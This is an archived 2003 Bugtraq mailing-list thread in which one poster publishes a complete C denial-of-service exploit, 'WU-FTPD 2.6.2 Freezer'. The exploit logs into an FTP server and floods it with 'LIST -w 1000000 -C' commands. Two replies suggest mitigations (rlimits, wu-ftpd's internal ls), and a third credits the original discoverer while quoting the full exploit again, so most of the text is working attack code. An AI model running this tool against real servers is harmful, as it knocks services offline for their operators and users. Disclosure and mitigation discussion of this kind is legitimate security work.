10912272 2003-10-31 14:55 +0000 /123 rader/ Angelo Rosiello <angelo.rosiello@katamail.com>
Importerad: 2003-10-31 18:07 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <29702>
Ärende: WU-FTPD 2.6.2 Freezer
------------------------------------------------------------
From: Angelo Rosiello <angelo.rosiello@katamail.com>
To: bugtraq@securityfocus.com
Message-ID: <20031031145543.19772.qmail@sf-www3-symnsj.securityfocus.com>
http://www.rosiello.org
Vulnerabilities Section.
/*
*
* http://www.rosiello.org
* (c) Rosiello Security
*
* Copyright Rosiello Security 2003
* All Rights reserved.
*
* Tested on Red Hat 9.0
*
* Author: Angelo Rosiello
* Mail : angelo@rosiello.org
* URL : http://www.rosiello.org
*
* This software is only for educational purpose.
* Do not use it against machines different from yours.
* Respect law.
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
void addr_initialize( );
void usage( );
int main( int argc, char **argv )
{
int i, sd, PORT, loop, error;
char user[30], password[30], ch;
struct sockaddr_in server_addr;
fprintf( stdout, "\n(c) Rosiello Security 2003\n" ); fprintf(
stdout, "http://www.rosiello.org\n" ); fprintf( stdout,
"WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );
if( argc != 6 ) usage( argv[0] );
if( strlen( argv[3] ) > 20 ) exit( 0 );
if( strlen( argv[4] ) > 20 ) exit( 0 );
sprintf( user, "USER %s\n", argv[3] );
sprintf( password, "PASS %s\n", argv[4] );
PORT = atoi( argv[2] );
loop = atoi( argv[5] );
addr_initialize( &server_addr, PORT, ( long )inet_addr(
argv[1] )); sd = socket( AF_INET, SOCK_STREAM, 0 );
error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
if( error != 0 )
{
perror( "Something wrong with the connection" );
exit( 0 );
}
while ( ch != '\n' )
{
recv( sd, &ch, 1, 0);
printf("%c", ch );
}
ch = '\0';
printf( "Connection executed, now waiting to log in...\n" );
printf( "%s", user );
send( sd, user, strlen( user ), 0 );
while ( ch != '\n' )
{
recv( sd, &ch, 1, 0);
printf("%c", ch );
}
printf( "%s", password );
ch = '\0';
send( sd, password, strlen( password ), 0 );
while ( ch != '\n' )
{
recv( sd, &ch, 1, 0);
printf("%c", ch );
}
printf( "Sending the DoS query\n" );
for( i=0; i<loop; i++ )
{
write( sd, "LIST -w 1000000 -C\n", 19 );
}
printf( "All done\n" );
close( sd );
return 0;
}
void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
address -> sin_family = AF_INET;
address -> sin_port = htons((u_short)port);
address -> sin_addr.s_addr = IPaddr;
}
void usage( char *program )
{
fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program);
exit(0);
}
(10912272) /Angelo Rosiello <angelo.rosiello@katamail.com>/(Ombruten)
Kommentar i text 10913146 av Seth Arnold <sarnold@wirex.com>
10913146 2003-10-31 11:40 -0800 /19 rader/ Seth Arnold <sarnold@wirex.com>
Importerad: 2003-10-31 22:57 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <29718>
Kommentar till text 10912272 av Angelo Rosiello <angelo.rosiello@katamail.com>
Ärende: Re: WU-FTPD 2.6.2 Freezer
------------------------------------------------------------
From: Seth Arnold <sarnold@wirex.com>
To: bugtraq@securityfocus.com
Message-ID: <20031031194044.GD27612@wirex.com>
On Fri, Oct 31, 2003 at 02:55:43PM -0000, Angelo Rosiello wrote:
> for( i=0; i<loop; i++ )
> {
> write( sd, "LIST -w 1000000 -C\n", 19 );
> }
It is probably worth pointing out that it is FSF ls(1) at fault here;
wu-ftpd just provides a convenient way for potentially unauthenticated
users to DoS the machine. If your OS supports rlimits (ulimit(3)), I
believe they will provide reliable protection against this problem.
--
http://www.immunix.com/ secure Linux distributions and appliances
(10913146) /Seth Arnold <sarnold@wirex.com>/--------
Bilaga (application/pgp-signature) i text 10913147
Kommentar i text 10915839 av Luca Berra <bluca@comedia.it>
10913147 2003-10-31 11:40 -0800 /9 rader/ Seth Arnold <sarnold@wirex.com>
Importerad: 2003-10-31 22:57 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <29719>
Bilaga (application/pgp-signature) till text 10913146
Ärende: Bilaga till: Re: WU-FTPD 2.6.2 Freezer
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQE/orq8+9nuM9mwoJkRAgdOAJ9BKH1M6dHOB63SWQWdmJH9r4vMHgCgn5qx
g3SVe+lkRu0sQVKiQQwSFhU=
=IzZd
-----END PGP SIGNATURE-----
(10913147) /Seth Arnold <sarnold@wirex.com>/--------
10915839 2003-11-01 15:47 +0100 /31 rader/ Luca Berra <bluca@comedia.it>
Importerad: 2003-11-01 23:26 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <29724>
Kommentar till text 10913146 av Seth Arnold <sarnold@wirex.com>
Ärende: Re: WU-FTPD 2.6.2 Freezer
------------------------------------------------------------
From: Luca Berra <bluca@comedia.it>
To: bugtraq@securityfocus.com
Message-ID: <20031101144736.GG875@percy.comedia.it>
On Fri, Oct 31, 2003 at 11:40:44AM -0800, Seth Arnold wrote:
>On Fri, Oct 31, 2003 at 02:55:43PM -0000, Angelo Rosiello wrote:
>> for( i=0; i<loop; i++ )
>> {
>> write( sd, "LIST -w 1000000 -C\n", 19 );
>> }
>
>It is probably worth pointing out that it is FSF ls(1) at fault here;
>wu-ftpd just provides a convenient way for potentially unauthenticated
>users to DoS the machine. If your OS supports rlimits (ulimit(3)), I
>believe they will provide reliable protection against this problem.
it might be also worth noting that wu-ftpd can be rebuilt with
internal ls code.
regards,
L.
--
Luca Berra -- bluca@comedia.it
Communication Media & Services S.r.l.
/"\
\ / ASCII RIBBON CAMPAIGN
X AGAINST HTML MAIL
/ \
(10915839) /Luca Berra <bluca@comedia.it>/(Ombruten)
10915912 2003-11-01 09:05 -0700 /248 rader/ Rossen Petrov <rpetrov@gmx.net>
Importerad: 2003-11-01 23:36 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <29730>
Ärende: Re: WU-FTPD 2.6.2 Freezer
------------------------------------------------------------
From: Rossen Petrov <rpetrov@gmx.net>
To: bugtraq@securityfocus.com
Message-ID: <6.0.0.22.2.20031101085553.01b7a860@mail.gmx.net>
let's not forget to give credit where credit is due. the bug was
discovered by Georgi Guninski and is documented in his 10/22/03
advisory at http://www.guninski.com/binls.html
Rossen
At 07:55 31.10.2003 you wrote:
>http://www.rosiello.org
>
>Vulnerabilities Section.
>
>
>
>
>
>/*
>
>*
>
>* http://www.rosiello.org
>
>* (c) Rosiello Security
>
>*
>
>* Copyright Rosiello Security 2003
>
>* All Rights reserved.
>
>*
>
>* Tested on Red Hat 9.0
>
>*
>
>* Author: Angelo Rosiello
>
>* Mail : angelo@rosiello.org
>
>* URL : http://www.rosiello.org
>
>*
>
>* This software is only for educational purpose.
>
>* Do not use it against machines different from yours.
>
>* Respect law.
>
>*
>
>*/
>
>
>
>#include <stdio.h>
>
>#include <sys/types.h>
>
>#include <sys/socket.h>
>
>#include <netinet/in.h>
>
>#include <string.h>
>
>
>
>void addr_initialize( );
>
>void usage( );
>
>
>
>int main( int argc, char **argv )
>
>{
>
> int i, sd, PORT, loop, error;
>
> char user[30], password[30], ch;
>
> struct sockaddr_in server_addr;
>
>
>
> fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
>
> fprintf( stdout, "http://www.rosiello.org\n" );
>
> fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );
>
>
>
> if( argc != 6 ) usage( argv[0] );
>
>
>
> if( strlen( argv[3] ) > 20 ) exit( 0 );
>
> if( strlen( argv[4] ) > 20 ) exit( 0 );
>
>
>
> sprintf( user, "USER %s\n", argv[3] );
>
> sprintf( password, "PASS %s\n", argv[4] );
>
>
>
> PORT = atoi( argv[2] );
>
> loop = atoi( argv[5] );
>
>
>
> addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
>
> sd = socket( AF_INET, SOCK_STREAM, 0 );
>
>
>
> error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof(
> server_addr ));
>
> if( error != 0 )
>
> {
>
> perror( "Something wrong with the connection" );
>
> exit( 0 );
>
> }
>
>
>
> while ( ch != '\n' )
>
> {
>
> recv( sd, &ch, 1, 0);
>
> printf("%c", ch );
>
> }
>
>
>
> ch = '\0';
>
>
>
> printf( "Connection executed, now waiting to log in...\n" );
>
>
>
> printf( "%s", user );
>
>
>
> send( sd, user, strlen( user ), 0 );
>
> while ( ch != '\n' )
>
> {
>
> recv( sd, &ch, 1, 0);
>
> printf("%c", ch );
>
> }
>
> printf( "%s", password );
>
>
>
> ch = '\0';
>
>
>
> send( sd, password, strlen( password ), 0 );
>
> while ( ch != '\n' )
>
> {
>
> recv( sd, &ch, 1, 0);
>
> printf("%c", ch );
>
> }
>
>
>
> printf( "Sending the DoS query\n" );
>
> for( i=0; i<loop; i++ )
>
> {
>
> write( sd, "LIST -w 1000000 -C\n", 19 );
>
> }
>
> printf( "All done\n" );
>
> close( sd );
>
> return 0;
>
>}
>
>
>
>void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
>
>{
>
> address -> sin_family = AF_INET;
>
> address -> sin_port = htons((u_short)port);
>
> address -> sin_addr.s_addr = IPaddr;
>
>}
>
>
>
>void usage( char *program )
>
>{
>
> fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n",
> program);
>
> exit(0);
>
>}
(10915912) /Rossen Petrov <rpetrov@gmx.net>/(Ombruten)